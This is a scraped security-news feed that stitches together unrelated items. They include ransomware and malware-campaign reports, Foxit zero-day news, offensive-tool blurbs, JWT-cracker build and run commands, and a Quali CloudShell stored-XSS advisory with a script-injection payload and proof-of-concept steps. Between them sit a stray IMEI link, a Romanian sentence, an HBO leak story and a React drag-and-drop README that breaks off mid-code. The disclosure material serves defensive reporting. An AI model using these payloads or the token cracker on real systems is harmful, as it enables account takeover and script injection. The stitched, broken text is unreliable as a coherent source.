9.3.3 jailbreak, I reused some of his code to demonstrate taking over a device from safari. Below is my video demonstration featured on EverythingApplePro Original Video Thanks For Viewing lucasjackson5815@gmail.com Download: EggShell-master.zip Source: http://lucasjackson.me/index.php/eggshell/

A newly discovered piece of ransomware hides its components inside online harmless-looking images that don’t trigger anti-virus detection. Dubbed SyncCrypt, the ransomware is distributed through spam emails that feature attachments containing WSF files pretending to be court orders. Once the attachments are executed, embedded JScript fetches seemingly innocuous images from specific locations and extracts malicious components hidden inside them. The ransomware components are stored inside the images as ZIP files, and they aren’t triggered if the user simply accesses their URL via browser. The aforementioned JScript, however, not only downloads the images, but also extracts the hidden malicious components (sync.exe, readme.html, and readme.png), BleepingComputer’s Lawrence Abrams reveals. The WSF file also creates a Windows scheduled task called Sync. Once the sync.exe file is executed, it starts scanning the victim’s computer for certain file types and encrypts them using AES encryption. The malware encrypts the used AES key with an embedded RSA-4096 public encryption key. The ransomware targets over 350 file types and appends the .kk extension to them after encryption. The threat skips files located in several folders, namely \windows\, \program files (x86)\, \program files\, \programdata\, \winnt\, \system volume information\, \desktop\readme\, and \$recycle.bin\. The ransomware demands around $430 to be paid to retrieve the decryption key. The attackers instruct victims to provide them with the key file after paying the ransom to receive a decrypter. The email addresses used as part of the analyzed attack include getmyfiles@keemail.me, getmyfiles@scryptmail.com, and getmyfiles@mail2tor.com. The distribution of this ransomware is highly effective because of its ability to bypass detection. According to Abrams, only one of the 58 vendors in VirusTotal could detect the malicious images at the time of analysis. Sync.exe, on the other hand, had a detection rate of 28 out of 63. To stay protected, users should pay extra care when opening attachments or clicking on URLs in emails received from unknown sources. They should also keep their files backed up at all times, to ensure they can recover their data without having to pay a ransom. Keeping all software on the machine updated at all times should decrease the chances of becoming infected. Source: http://www.securityweek.com/synccrypt-ransomware-hides-components-image-files

add IMEI here https://imei.org/results/?_h=93F2648CCE7FE812420E2C3C5FE5C2B18AAFE3873872AF489C85DF1D39EDB2A6

Are you using Foxit PDF Reader? If yes, then you need to watch your back. Security researchers have discovered two critical zero-day security vulnerabilities in Foxit Reader software that could allow attackers to execute arbitrary code on a targeted computer, if not configured to open files in the Safe Reading Mode. The first vulnerability (CVE-2017-10951) is a command injection bug discovered by researcher Ariele Caltabiano working with Trend Micro's Zero Day Initiative (ZDI), while the second bug (CVE-2017-10952) is a file write issue found by Offensive Security researcher Steven Seeley. An attacker can exploit these bugs by sending a specially crafted PDF file to a Foxit user and enticing them to open it. Foxit refused to patch both the vulnerabilities because they would not work with the "safe reading mode" feature that fortunately comes enabled by default in Foxit Reader. However, researchers believe building a mitigation doesn't patch the vulnerabilities completely, which if remained unpatched, could be exploited if attackers find a way to bypass safe reading mode in the near future. Both unpatched vulnerabilities can be triggered through the JavaScript API in Foxit Reader. CVE-2017-10951: The command injection bug resides in an app.launchURL function that executes strings provided by attackers on the targeted system due to lack of proper validation, as demonstrated in the video given below. CVE-2017-10952: This vulnerability exists within the "saveAs" JavaScript function that allows attackers to write an arbitrary file on a targeted system at any specific location, as demonstrated in the video given below. If you are one of those using Foxit Reader and PhantomPDF, ensure you have the "Safe Reading Mode" feature enabled. Additionally, you can also uncheck the "Enable JavaScript Actions" from Foxit's Preferences menu, although this may break some functionality. Users are also recommended always to be vigilant while opening any files they received via email. Just recently, we reported how opening a malicious PowerPoint file could compromise your computer with malware. So, always beware of phishing emails, spams, and clicking the malicious attachment. Source: https://thehackernews.com/2017/08/two-critical-zero-day-flaws-disclosed.html

More than 4.7 million users were apparently exposed to potentially malicious ads and credential theft after cybercriminals managed to hijack the developer accounts of several popular Chrome extensions. The actors used phishing emails to gain access to the developers’ Google accounts and submit to the Chrome Web Store malicious versions of legitimate extensions. The malicious code injected in these tools was meant to modify the advertisements displayed to users and to grab specific credentials from the victims’ machines. After taking a closer look at the incidents, Proofpoint concluded that 8 Chrome extensions have been compromised by the actor using the same modus operandi: Web Developer Chrometana Infinity New Tab CopyFish Web Paint Social Fixer TouchVPN Betternet VPN At the moment, these extensions have a combined user base of more than 4.77 million users. As previously reported, the phishing attack to compromise the developer accounts was pretty straightforward: an email purporting to come from Google Support prompted the targeted developers to log into their accounts to update some information. The login link in the email, however, would take developers to the attacker’s site instead, resulting in their credentials being stolen. Next, the attackers would take over the compromised developer account and/or hijack their Chrome extension to replace it with a malicious variant. According to Proofpoint, the actor included in the code a check to ensure the extension has been installed for at least 10 minutes before starting the malicious behavior, most probably in an attempt to bypass detection. The malicious code was also observed attempting to retrieve a remote file called ga.js over HTTPS, from a domain generated via a domain generation algorithm (DGA). Analysis of the malicious components in Web Developer revealed that the code from this step was meant to conditionally call additional scripts, including some that would harvest Cloudflare credentials after the victim’s login. Next, “the compromised version of the extension attempts to substitute ads on the victim’s browser, hijacking traffic from legitimate advertising networks,” Proofpoint says, adding that the attackers focused mainly on carefully crafted substitution ads on adult websites, although they targeted a variety of other websites as well. The ad substitutions work for 33 popular banner sizes including 468x60, 728x90, and many more spanning numerous aspect ratios, the researchers say. In many instances, the victims were presented with fake JavaScript alerts claiming that the computer required repairing. Clicking on these ads would redirect users to affiliate programs from which the threat actors could profit. Proofpoint observed the compromised Web Developer extension directing victims to two such affiliates, but says that others may also have been used. The popup alerts were also associated with the compromise of the Infinity New Tab extension in May 2017, as well as with fake EU cookie-consent alerts last year. Via http://www.securityweek.com/hijacked-extensions-put-47-million-chrome-users-risk

HBO doesn't need hackers to leak its widely watched "Game of Thrones" episodes, as it is sufficient enough to leak them by its own. In what seems to be a terrible blunder, HBO Spain appeared to have accidentally broadcast the next episode—Episode 6—of Game of Thrones season 7 five days before its official premiere. And as expected, the GoT episode 6 quickly began circulating online. HBO has recently been facing trouble from a hacker or group of hackers who claimed to have obtained nearly 1.5 terabytes of information from the entertainment company. Late last month, the unknown hackers dropped upcoming episodes of "Ballers" as well as "Room 104," along with a script of the fourth episode of "Game of Thrones" on the internet. The leak was followed by another dump of a half-gigabyte sample of stolen HBO data, including HBO's emails, employment agreements, and balance sheets, along with the script of the upcoming Game of Thrones episode, demanding a ransom—nearly $6 Million in Bitcoins. A recently leaked screenshot of an email from an HBO executive also suggested that the company offered hackers $25,000 and requested them to extend the ransom payment deadline by one week. Sadly, the proposal apparently failed to satisfy the desires of HBO hackers, and they threatened to release more data from its 1.5 terabytes of stolen data every Sunday until the complete ransom of millions of dollars was paid. However, the recent leak has nothing to do with hackers, and rather the new unreleased episode was accidentally broadcast by HBO Nordic in Spain for about an hour before it was removed, first spotted by Reddit users. The new GOT episode was purportedly available via the HBO's Spanish on-demand service. Here's what HBO has to say about the latest leak: Short footage and GIFs from the GOT S07E06 was started circulating on YouTube, Reddit, Instagram, Twitch and other streaming services. The episode 6 of "Game of Thrones" will officially be premiered on Sunday at 9 p.m. on HBO. Via https://thehackernews.com/2017/08/game-of-thrones-season7.html

PyStat - Advanced Netstat For Windows Features: Know remote address of process Know remote ports of process Know which user using process along with title & PID Changelogs: Auto Install python modules support added in install.py Installation Guide Download the .zip file Extract the pystat folder from .zip file to some drive i.e C:\tools\pystat Goto C:\tools\pystat Press SHIFT KEY + RIGHT CLICK and select open Command Window here Enter this command python install.py, Enjoy Warning! Don't move pystat folder after installation, will stop working Download PyStat-master.zip Source: https://github.com/roothaxor/PyStat

AUTHENTICATION SERVER The idea behind Isolate is that we should somehow manage how do people get access to our servers. How can we make this process more secure? How could we prevent a system from being compromised when someone lost the laptop with ssh key. What would we do in case someone quits the company - is there an alternative to just changing all passwords, keys, etc? Isolate adds OTP 2FA to SSH login. It could be hardware YubiKey or Google Authenticator app. If someone lost the password - OTP key is here and the intruder can't get access to the bastion host. Users don't get direct access to endpoint servers - they go there through Isolate server, the system tracks their actions. You can easily manage access to the bastion server - add/remove users, etc. Technically you should generate and place the bastion host key on endpoint servers, and users will get regular access to Isolate server with the sudoer access to ssh command. Once they want to connect to the endpoint server, the system executes ssh command and ssh client running with privileged user permissions gets server key and using it the system gets access to the server we need to get access to. Supports OTP (counter and time based) 2FA algorithms SSH sessions logging Requirements Fresh CentOS 7 / Ubuntu 16.04 / Debian 9 setup Ansible 2.3+ for install or update Installation https://github.com/itsumma/isolate#install Download isolate-master.zip Source: https://github.com/itsumma/isolate

tu chiar nu observi ca nu iti acord atentie?!

Description SAML Raider is a Burp Suite extension for testing SAML infrastructures. It contains two core functionalities: Manipulating SAML Messages and manage X.509 certificates. This software was created by Roland Bischofberger and Emanuel Duss during a bachelor thesis at the Hochschule für Technik Rapperswil (HSR). Our project partner and advisor was Compass Security Schweiz AG. We thank Compass for the nice collaboration and support during our bachelor thesis. Features The extension is divided in two parts. A SAML message editor and a certificate management tool. Message Editor Features of the SAML Raider message editor: Sign SAML Messages Sign SAML Assertions Remove Signatures Edit SAML Message (Supported Messages: SAMLRequest and SAMLResponse) Preview eight common XSW Attacks Execute eight common XSW Attacks Send certificate to SAMl Raider Certificate Management Undo all changes of a SAML Message Supported Profiles: SAML Webbrowser Single Sign-on Profile, Web Services Security SAML Token Profile Supported Bindings: POST Binding, Redirect Binding, SOAP Binding, URI Binding Certificate Management Features of the SAML Raider Certificate Management: Import X.509 certificates (PEM and DER format) Import X.509 certificate chains Export X.509 certificates (PEM format) Delete imported X.509 certificates Display informations of X.509 certificates Import private keys (PKCD#8 in DER format and traditional RSA in PEM Format) Export private keys (traditional RSA Key PEM Format) Cloning X.509 certificates Cloning X.509 certificate chains Create new X.509 certificates Editing and self-sign existing X.509 certificates Download: saml-raider-1.2.1.jar Installation: https://github.com/SAMLRaider/SAMLRaider#installation Source: https://github.com/SAMLRaider/SAMLRaider

JWT cracker A multi-threaded JWT brute-force cracker written in C. If you are very lucky or have a huge computing power, this program should find the secret key of a JWT token, allowing you to forge valid tokens. This is for testing purposes only, do not put yourself in trouble I used the Apple Base64 implementation that I modified slightly. Compile Make sure you have openssl's headers installed. On Ubuntu you can install them with apt-get install libssl-dev make If you use a Mac, you can install OpenSSL with brew install openssl, but the headers will be stored in a different location: make OPENSSL=/usr/local/opt/openssl/include OPENSSL_LIB=-L/usr/local/opt/openssl/lib Run $ > ./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.cAOIAifu3fykvhkHpbuhbvtH807-Z2rI1FS3vX1XMjE In the above example, the key is Sn1f. It takes approximately 2 seconds to crack on my Macbook. Contribute No progress status If you stop the program, you cannot start back where you were IMPORTANT: Known bugs The base64 implementation I use (from Apple) is sometimes buggy because not every Base64 implementation is the same. So sometimes, decrypting of your Base64 token will only work partially and thus you will be able to find a secret to your token that is not the correct one. If someone is willing to implement a more robust Base64 implementation, that would be great Download c-jwt-cracker-master.zip Source: https://github.com/brendan-rius/c-jwt-cracker

Quali CloudShell version 7.1.0.65.08 (Patch 6) suffers from multiple persistent cross site scripting vulnerabilities. # Vulnerability type: Multiple Stored Cross Site Scripting # Vendor: Quali # Product: CloudShell # Affected version: v7.1.0.6508 (Patch 6) # Patched version: v8 and up # Credit: Benjamin Lee # CVE ID: CVE-2017-9767 ========================================================== # Overview Quali CloudShell (v7.1.0.6508 Patch 6) is vulnerable to multiple stored XSS vulnerabilities on its platform this can be exploited to execute arbitrary HTML and script code on all users (including administrators) from a low-privileged account. ========================================================== # Vulnerable URL 1 (Reservation Function) /RM/Reservation/ReserveNew # Vulnerable parameter(s) - Name - Description # Sample payload '"><script>alert("xss")</script> # PROOF OF CONCEPT - Go to the "Inventory" tab - Click on details button on either of the items - Click on the reserve button and enter the XSS payload onto the affected parameters - Add users to the permitted user list (e.g. admin accounts) - Once the user click on the reservation list details, the XSS would be executed ========================================================== # Vulnerable URL 2 (Environment Function) /RM/Topology/Update # Vulnerable parameter(s) - Description # Sample payload '"><script>alert("xss")</script> # PROOF OF CONCEPT - Go to the "Environment" tab - Click on item properties button - Enter the XSS payload onto the affected parameters - Change the owner to another user (e.g. admin accounts) - Once the user click on the more info button of the item in the environment tab, the XSS would be executed ========================================================== # Vulnerable URL 3 (Job Scheduling Function) /SnQ/JobTemplate/Edit?jobTemplateId=<job template id> # Vulnerable parameter(s) - Name - Description - ExecutionBatches[0].Name - ExecutionBatches[0].Description - Labels # Sample payload '"><script>alert("xss")</script> # PROOF OF CONCEPT - Go to the "Job Scheduling > Add New Suite" tab - Enter the XSS payload onto the affected parameters - Once the user view details of this suite, the XSS would be executed ========================================================== # Vulnerable URL 4 (Resource Template Function) /RM/AbstractTemplate/AddOrUpdateAbstractTemplate # Vulnerable parameter(s) - Alias - Description # Sample payload '"><script>alert("xss")</script> # PROOF OF CONCEPT - Go to the "Inventory > abstract template > Add New" tab - Enter the XSS payload onto the affected parameters - Once the user click on the more info button of the item, the XSS would be executed ========================================================== # Timeline - 06/06/2017: Vulnerability found - 20/06/2017: Vendor informed - 20/06/2017: Vendor responded and acknowledged - 16/07/2017: Vendor fixed the issue - 12/08/2017: Vendor agreed on public disclosure - 14/08/2017: Public disclosure https://packetstormsecurity.com/files/143746/Quali-CloudShell-7.1.0.6508-Patch-6-Cross-Site-Scripting.html

A few months back we reported how opening a simple MS Word file could compromise your computer using a critical vulnerability in Microsoft Office. The Microsoft Office remote code execution vulnerability (CVE-2017-0199) resided in the Windows Object Linking and Embedding (OLE) interface for which a patch was issued in April this year, but threat actors are still abusing the flaw through the different mediums. Security researchers have spotted a new malware campaign that is leveraging the same exploit, but for the first time, hidden behind a specially crafted PowerPoint (PPSX) Presentation file. According to the researchers at Trend Micro, who spotted the malware campaign, the targeted attack starts with a convincing spear-phishing email attachment, purportedly from a cable manufacturing provider and mainly targets companies involved in the electronics manufacturing industry. Researchers believe this attack involves the use of a sender address disguised as a legitimate email sent by a sales and billing department. Here's How the Attack Works: The complete attack scenario is listed below: Step 1: The attack begins with an email that contains a malicious PowerPoint (PPSX) file in the attachment, pretending to be shipping information about an order request. Step 2: Once executed, the PPSX file calls an XML file programmed in it to download "logo.doc" file from a remote location and runs it via the PowerPoint Show animations feature. Step 3: The malformed Logo.doc file then triggers the CVE-2017-0199 vulnerability, which downloads and executes RATMAN.exe on the targeted system. Step 4: RATMAN.exe is a Trojanized version of the Remcos Remote Control tool, which when installed, allows attackers to control infected computers from its command-and-control server remotely. Remcos is a legitimate and customizable remote access tool that allows users to control their system from anywhere in the world with some capabilities, like a download and execute the command, a keylogger, a screen logger, and recorders for both webcam and microphone. Since the exploit is used to deliver infected Rich Text File (.RTF) documents, most detection methods for CVE-2017-0199 focuses on the RTF. So, the use of a new PPSX files allows attackers to evade antivirus detection as well. The easiest way to prevent yourself completely from this attack is to download and apply patches released by Microsoft in April that will address the CVE-2017-0199 vulnerability. Source

Beautiful, accessible drag and drop for lists with React.js Examples See how beautiful it is for yourself - have a play with the examples! Core characteristics: beautiful, natural movement of items clean and powerful api which is simple to get started with unopinionated styling no creation of additional wrapper dom nodes - flexbox and focus management friendly! plays well with existing interactive nodes such as anchors state driven dragging - which allows for dragging from many input types, including programatic dragging. Currently only mouse and keyboard dragging are supported Why not react-dnd? There are a lot of libraries out there that allow for drag and drop interactions within React. Most notable of these is the amazing react-dnd. It does an incredible job at providing a great set of drag and drop primitives which work especially well with the wildly inconsistent html5 drag and drop feature. react-beautiful-dnd is a higher level abstraction specifically built for vertical and horizontal lists. Within that subset of functionality react-beautiful-dnd offers a powerful, natural and beautiful drag and drop experience. However, it does not provide the breadth of functionality offered by react-dnd. So this library might not be for you depending on what your use case is. Still young! This library is still fairly new and so there is a relatively small feature set. Be patient! Things will be moving rather quickly! Currently supported feature set dragging an item within a single vertical list multiple independent lists on the one page mouse and keyboard dragging flexible height items (the draggable items can have different heights) custom drag handle (you can drag a whole item by just a part of it) the vertical list can be a scroll container (without a scrollable parent) or be the child of a scroll container (that also does not have a scrollable parent) Short term backlog Dragging within a horizontal list Moving items between vertical lists (until this lands conditional dropping will not be available) Medium term backlog Moving items between horizontal lists Moving a Draggable from a vertical list to a horizontal list Dragging multiple items at once Long term backlog Touch support Automatically disabling animations when the frame rate drops below a threshold. A mechanism to programatically perform dragging without user input And lots more! Basic usage example This is a simple reorderable list. You can play with it on webpackbin import React, { Component } from 'react'; import ReactDOM from 'react-dom'; import { DragDropContext, Droppable, Draggable } from 'react-beautiful-dnd'; // fake data generator const getItems = (count) => Array.from({length: count}, (v, k) => k).map(k => ({ id: `item-${k}`, content: `item ${k}` })); // a little function to help us with reordering the result const reorder = (list, startIndex, endIndex) => { const result = Array.from(list); const [removed] = result.splice(startIndex, 1); result.splice(endIndex, 0, removed); return result; }; // using some little inline style helpers to make the app look okay const grid = 8; const getItemStyle = (draggableStyle, isDragging) => ({ // some basic styles to make the items look a bit nicer userSelect: 'none', padding: grid * 2, marginBottom: grid, // change background colour if dragging background: isDragging ? 'lightgreen' : 'grey', // styles we need to apply on draggables ...draggableStyle }); const getListStyle = (isDraggingOver) => ({ background: isDraggingOver ? 'lightblue' : 'lightgrey', padding: grid, width: 250 }); class App extends Component { constructor(props) { super(props); this.state = { items: getItems(10) } this.onDragEnd = this.onDragEnd.bind(this); } onDragEnd (result) { // dropped outside the list if(!result.destination) { return; } const items = reorder( this.state.items, result.source.index, result.destination.index ); this.setState({ items }); } // Normally you would want to split things out into separate components. // But in this example everything is just done in one place for simplicity render() { return ( <DragDropContext onDragEnd={this.onDragEnd}> <Droppable droppableId="droppable"> {(provided, snapshot) => ( <div ref={provided.innerRef} style={getListStyle(snapshot.isDraggingOver)} > {this.state.items.map(item => ( <Draggable key={item.id} draggableId={item.id} > {(provided, snapshot) => ( <div> <div ref={provided.innerRef} style={getItemStyle( provided.draggableStyle, snapshot.isDragging )} {...provided.dragHandleProps} > {item.content} </div> {provided.placeholder} </div> )} </Draggable> ))} </div> )} </Droppable> </DragDropContext> ); } } // Put the thing into the DOM! ReactDOM.render(<App />, document.getElementById('app')); Core design principle Drag and drop with react-beautiful-dnd is supposed to feel physical and natural - similar to that of moving physical objects around. Things should never 'snap' anywhere. Rather, everything should move naturally as much as possible. Application 1: knowing when to move Draggables will move into their new position based on their center of gravity. Regardless of where a user grabs an item from - the movement of other things is based on its center position. This is similar to a set of scales . Here are some rules that are followed to allow for a natural drag experience even with items of flexible height: A Droppable is dragged over when the center position of a dragging item goes over one of the boundaries of the Droppable A resting Draggable will move out of the way of a dragging Draggable when the center position of the dragging Draggable goes over the edge of the resting Draggable. Put another way: once the center position of a Draggable (A) goes over the edge of another Draggable (B), B moves out of the way. Application 2: no drop shadows Drop shadows are useful in an environment where items and their destinations snap around. However, with react-beautiful-dnd it should be obvious where things will be dropping based on the movement of items. This might be changed in the future - but the experiment is to see how far we can get without any of these affordances. Sloppy clicks and click blocking A drag will not start until a user has dragged their mouse past a small threshold. If this threshold is not exceeded then the library will not impact the mouse click and will release the event to the browser. When a user presses the mouse down on an element, we cannot determine if the user was clicking or dragging. If the sloppy click threshold was not exceeded then the event will be treated as if it where a click and the click event will bubble up unmodified. If the user has started dragging by moving the mouse beyond the sloppy click threshold then the click event will be prevented. This behavior allows you to wrap an element that has click behavior such as an anchor and have it work just like a standard anchor while also allowing it to be dragged. is a schrodinger's cat joke) Focus management react-beautiful-dnd does not create any wrapper elements. This means that it will not impact the usage tab flow of a document. For example, if you are wrapping an anchor tag then the user will tab to the anchor directly and not an element surrounding the anchor. Whatever element you wrap will be given a tab-index to ensure that users can tab to the element to perform keyboard dragging. Keyboard dragging Traditionally drag and drop interactions have been exclusively a mouse or touch interaction. This library supports drag and drop interactions using only a keyboard. This enables power users to drive more of our interfaces with a keyboard. It also opens drag and drop interactions to those who previously would be unable to use them due to an impediment. Shortcuts Currently the keyboard handling is hard coded. This could be changed in the future to become customisable. Here is the existing keyboard mapping: tab ↹ - standard browser tabbing will navigate through the Droppable's. The library does not do anything fancy with tab while users are selecting. Once a drag has started, tab is blocked for the duration of the drag. spacebar - lift a focused Draggable. Also, drop a dragging Draggable where the drag was started with a spacebar. Up arrow ↑ - move a Draggable that is dragging up on a vertical list Down arrow ↓ - move a Draggable that is dragging down on a vertical list Escape esc - cancel an existing drag - regardless of whether the user is dragging with the keyboard or mouse. Limitations of keyboard dragging There is a currently limitation of keyboard dragging: the drag will cancel if the user scrolls the window. This could be worked around but for now it is the simpliest initial approach. Installation # yarn yarn add react-beautiful-dnd # npm npm install react-beautiful-dnd --save API So how do you use the library? DragDropContext In order to use drag and drop, you need to have the part of your react tree that you want to be able to use drag and drop in wrapped in a DragDropContext. It is advised to just wrap your entire application in a DragDropContext. Having nested DragDropContext's is not supported. You will be able to achieve your desired conditional dragging and dropping using the props of Droppable and Draggable. You can think of DragDropContext as having a similar purpose to the react-redux Provider component Prop type information type Hooks = {| onDragStart?: (id: DraggableId, location: DraggableLocation) => void, onDragEnd: (result: DropResult) => void, |} type Props = Hooks & {| children?: ReactElement, |} Basic usage import { DragDropContext } from 'react-beautiful-dnd'; class App extends React.Component { onDragStart = () => {...} onDragEnd = () => {...} render() { return ( <DragDropContext onDragStart={this.onDragStart} onDragEnd={this.onDragEnd} > <div>Hello world</div> </DragDropContext> ) } } Hooks These are top level application events that you can use to perform your own state updates. onDragStart (optional) This function will get notified when a drag starts. You are provided with the following details: id: the id of the Draggable that is now dragging location: the location (droppableId and index) of where the dragging item has started within a Droppable. This function is optional and therefore does not need to be provided. It is highly recommended that you use this function to block updates to all Draggable and Droppable components during a drag. (See Best hooks practices) Type information onDragStart?: (id: DraggableId, location: DraggableLocation) => void // supporting types type Id = string; type DroppableId: Id; type DraggableId: Id; type DraggableLocation = {| droppableId: DroppableId, // the position of the draggable within a droppable index: number |}; onDragEnd (required) This function is extremely important and has an critical role to play in the application lifecycle. This function must result in the synchronous reordering of a list of Draggables It is provided with all the information about a drag: result: DragResult result.draggableId: the id of the Draggable was dragging. result.source: the location that the Draggable started in. result.destination: the location that the Draggable finished in. The destination will be null if the user dropped into no position (such as outside any list) or if they dropped the Draggable back into the same position that it started in. Synchronous reordering Because this library does not control your state, it is up to you to synchronously reorder your lists based on the result. Here is what you need to do: if the destination is null: all done! if source.droppableId equals destination.droppableId you need to remove the item from your list and insert it at the correct position. if source.droppableId does not equal destination.droppable you need to the Draggable from the source.droppableId list and add it into the correct position of the destination.droppableId list. Type information onDragEnd: (result: DropResult) => void // supporting types type DropResult = {| draggableId: DraggableId, source: DraggableLocation, // may not have any destination (drag to nowhere) destination: ?DraggableLocation |} type Id = string; type DroppableId: Id; type DraggableId: Id; type DraggableLocation = {| droppableId: DroppableId, // the position of the droppable within a droppable index: number |}; Best practices for hooks Block updates during a drag It is highly recommended that while a user is dragging that you block any state updates that might impact the amount of Draggables and Droppables, or their dimensions. Please listen to onDragStart and block updates to the Draggables and Droppables until you receive at onDragEnd. When the user starts dragging we take a snapshot of all of the dimensions of the applicable Draggable and Droppable nodes. If these change during a drag we will not know about it. Here are a few poor user experiences that can occur if you change things during a drag: If you increase the amount of nodes the library will not know about them and they will not be moved when the user would expect them to be. If you decrease the amount of nodes then there might be gaps and unexpected movements in your lists. If you change the dimensions of any node, it can cause the changed node as well as others to move at incorrect times. If you remove the node that the user is dragging the drag will instantly end If you change the dimension of the dragging node then other things will not move out of the way at the correct time. onDragStart and onDragEnd pairing We try very hard to ensure that each onDragStart event is paired with a single onDragEnd event. However, there maybe a rouge situation where this is not the case. If that occurs - it is a bug. Currently there is no mechanism to tell the library to cancel a current drag externally. Style During a drag it is recommended that you add two styles to the body: user-select: none; and cursor: grab; (or whatever cursor you want to use while dragging) user-select: none; prevents the user drag from selecting text on the page as they drag. cursor: [your desired cursor]; is needed because we apply pointer-events: none; to the dragging item. This prevents you setting your own cursor style on the Draggable directly based on snapshot.isDragging (see Draggable). Dynamic hooks Your hook functions will only be captured once at start up. Please do not change the function after that. If there is a valid use case for this then dynamic hooks could be supported. However, at this time it is not. Droppable Droppable components can be dropped on by a Draggable. They also contain Draggables. A Draggable must be contained within a Droppable. import { Droppable } from 'react-beautiful-dnd'; <Droppable droppableId="droppable-1" type="PERSON" > {(provided, snapshot) => ( <div ref={provided.innerRef} style={{backgroundColor: snapshot.isDraggingOver ? 'blue' : 'grey'}} > I am a droppable! </div> )} </Droppable> Props droppableId: A required DroppableId(string) that uniquely identifies the droppable for the application. Please do not change this prop - especially during a drag. type: An optional TypeId(string) that can be used to simply accept a class of Draggable. For example, if you use the type PERSON then it will only allow Draggables of type PERSON to be dropped on itself. Draggables of type TASK would not be able to be dropped on a Droppable with type PERSON. If no type is provided, it will be set to 'DEFAULT'. Currently the type of the Draggables within a Droppable must be the same. This restriction might be loosened in the future if there is a valid use case. isDropDisabled: An optional flag to control whether or not dropping is currently allowed on the Droppable. You can use this to implement your own conditional dropping logic. It will default to false. Children function The React children of a Droppable must be a function that returns a ReactElement. <Droppable droppableId="droppable-1"> {(provided, snapshot) => ( // ... )} </Droppable> The function is provided with two arguments: 1. provided: (Provided) type Provided = {| innerRef: (HTMLElement) => mixed, |} In order for the droppable to function correctly, you must bind the provided.innerRef to the highest possible DOM node in the ReactElement. We do this in order to avoid needing to use ReactDOM to look up your DOM node. <Droppable droppableId="droppable-1"> {(provided, snapshot) => ( <div ref={provided.innerRef}> Good to go </div> )} </Droppable> 2. snapshot: (StateSnapshot) type StateSnapshot = {| isDraggingOver: boolean, |} The children function is also provided with a small about of state relating to the current drag state. This can be optionally used to enhance your component. A common use case is changing the appearance of a Droppable while it is being dragged over. <Droppable droppableId="droppable-1"> {(provided, snapshot) => ( <div ref={provided.innerRef} style={{backgroundColor: snapshot.isDraggingOver ? 'blue' : 'grey'}} > I am a droppable! </div> )} </Droppable> Conditionally dropping Keep in mind that this is not supported at this time. In this current initial version we only support reordering within a single list. Droppables can only be dropped on by Draggables who share the same type. This is a simple way of allowing conditional dropping. If you do not provide a type for the Droppable then it will only accept Draggables which also have the default type. Draggables and Droppables both will have their types set to 'DEFAULT' when none is provided. There is currently no way to set multiple types, or a type wildcard that will accept Draggables of multiple any types. This could be added if there is a valid use case. Using the isDropDisabled prop you can conditionally allow dropping. This allows you to do arbitrarily complex conditional transitions. This will only be considered if the type of the Droppable matches the type of the currently dragging Draggable. You can disable dropping on a Droppable altogether by always setting isDropDisabled to false. You can do this to create a list that is never able to be dropped on, but contains Draggables. Technically you do not need to use type and do all of your conditional drop logic with the isDropDisabled function. The type parameter is a convenient shortcut for a common use case. Scroll containers This library supports dragging within scroll containers (DOM elements that have overflow: auto; or overflow: scroll;). The only supported use cases are: The Droppable can itself be a scroll container with no scrollable parents The Droppable has one scrollable parent Auto scrolling is not provided Currently auto scrolling of scroll containers is not part of this library. Auto scrolling is where the container automatically scrolls to make room for the dragging item as you drag near the edge of a scroll container. You are welcome to build your own auto scrolling list, or if you would you really like it as part of this library we could provide a auto scrolling Droppable. Users will be able to scroll a scroll container while dragging by using their trackpad or mouse wheel. Keyboard dragging limitation Getting keyboard dragging to work with scroll containers is quite difficult. Currently there is a limitation: you cannot drag with a keyboard beyond the visible edge of a scroll container. This limitation could be removed if we introduced auto scrolling. Draggable Draggable components can be dragged around and dropped onto Droppables. A Draggable must always be contained within a Droppable. It is possible to reorder a Draggable within its home Droppable or move to another Droppable. It is possible because a Droppable is free to control what it allows to be dropped on it. Note: moving between Droppables is currently not supported in the initial version. import { Draggable } from 'react-beautiful-dnd'; <Draggable draggableId="draggable-1" type="PERSON" > {(provided, snapshot) => ( <div> <div ref={draggableProvided.innerRef} style={draggableProvided.draggableStyle} {...draggableProvided.dragHandleProps} > <h4>My draggable</h4> </div> {provided.placeholder} </div> )} </Draggable> Note: when the library moves to React 16 this will be cleaned up a little bit as we will be able to return the placeholder as a sibling to your child function without you needing to create a wrapping element Props draggableId: A required DraggableId(string) that uniquely identifies the Draggable for the application. Please do not change this prop - especially during a drag. type: An optional type (TypeId(string)) of the Draggable. This is used to control what Droppables the Draggable is permitted to drop on. Draggables can only drop on Droppables that share the same type. If no type is provided, it will be set to 'DEFAULT'. Currently the type of a Draggable must be the same as its container Droppable. This restriction might be loosened in the future if there is a valid use case. isDragDisabled: An optional flag to control whether or not dropping is currently allowed on the Droppable. You can use this to implement your own conditional dropping logic. It will default to false. Children function The React children of a Draggable must be a function that returns a ReactElement. <Draggable draggableId="draggable-1"> {(provided, snapshot) => ( <div> <div ref={provided.innerRef} style={provided.draggableStyle} {...provided.dragHandleProps} > Drag me! </div> {provided.placeholder} </div> )} </Draggable> The function is provided with two arguments: 1. provided: (Provided) type Provided = {| innerRef: (HTMLElement) => void, draggableStyle: ?DraggableStyle, dragHandleProps: ?DragHandleProvided, placeholder: ?ReactElement, |} Everything within the provided object must be applied for the Draggable to function correctly. provided.innerRef (innerRef: (HTMLElement) => void): In order for the Droppable to function correctly, you must bind the innerRef function to the ReactElement that you want to be considered the Draggable node. We do this in order to avoid needing to use ReactDOM to look up your DOM node. <Draggable draggableId="draggable-1"> {(provided, snapshot) => ( <div ref={provided.innerRef}> Drag me! </div> )} </Draggable> Type information innerRef: (HTMLElement) => void provided.draggableStyle (?DraggableStyle): This is an Object or null that contains an a number of styles that needs to be applied to the Draggable. This needs to be applied to the same node that you apply provided.innerRef to. The controls the movement of the draggable when it is dragging and not dragging. You are welcome to add your own styles to this object - but please do not remove or replace any of the properties. Ownership It is a contract of this library that it own the positioning logic of the dragging element. This includes properties such as top, right, bottom, left and transform. The library may change how it positions things and what properties it uses without performing a major version bump. It is also recommended that you do not apply your own transition property to the dragging element. <Draggable draggableId="draggable-1"> {(provided, snapshot) => ( <div> <div ref={provided.innerRef} style={provided.draggableStyle} > Drag me! </div> </div> )} </Draggable> Extending with your own styles <Draggable draggable="draggable-1"> {(provided, snapshot) => { const style = { ...provided.draggableStyle, backgroundColor: snapshot.isDragging : 'blue' : 'white', fontSize: 18, } return ( <div> <div ref={provided.innerRef} style={style} > 